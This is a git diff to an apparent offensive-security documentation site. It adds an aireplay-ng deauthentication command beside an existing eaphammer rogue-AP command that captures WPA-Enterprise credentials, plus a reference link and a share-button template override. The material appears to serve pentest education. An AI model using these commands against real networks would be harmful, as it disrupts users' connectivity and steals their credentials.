diff --git a/docs/protocols/wifi/wifi-corporate.md b/docs/protocols/wifi/wifi-corporate.md index 3bdeb34..8a37566 100644 --- a/docs/protocols/wifi/wifi-corporate.md +++ b/docs/protocols/wifi/wifi-corporate.md @@ -15,6 +15,9 @@ WPA EAP refers to the use of the Extensible Authentication Protocol (EAP) within # launch attack ./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds + + # deauth users and wait for them to connect to our AP + aireplay-ng -0 0 -a MAC_ADDR_AP -c MAC_ADDR_CIBLE wlan0mon ``` * [Stealing RADIUS Credentials Using EAPHammer](https://github.com/s0lst1c3/eaphammer/wiki/II.-Stealing-RADIUS-Credentials-Using-EAPHammer) @@ -109,4 +112,4 @@ Sniff > Unified sniffing > Hacker Interface ## References -* [TODO](#) \ No newline at end of file +* [Retex : Test d’intrusion Wi-Fi (WPA2-Enterprise) - @virtualsamuraii](https://virtualsamuraii.github.io/network/retex-pentest-wifi-wpa2-enterprise/) \ No newline at end of file diff --git a/mkdocs.yml b/mkdocs.yml index 94e426d..1d10c9e 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -7,6 +7,7 @@ edit_uri: blob/main/docs/ theme: name: material + custom_dir: overrides color_mode: auto user_color_mode_toggle: true icon: diff --git a/overrides/main.html b/overrides/main.html new file mode 100644 index 0000000..c351a22 --- /dev/null +++ b/overrides/main.html @@ -0,0 +1,26 @@ +{% extends "base.html" %} + +{% block content %} + {{ super() }} +
+ Share this content +
+ + + + + + +
+ +
+{% endblock %} + +{% block styles %} + {{ super() }} + +{% endblock %} \ No newline at end of file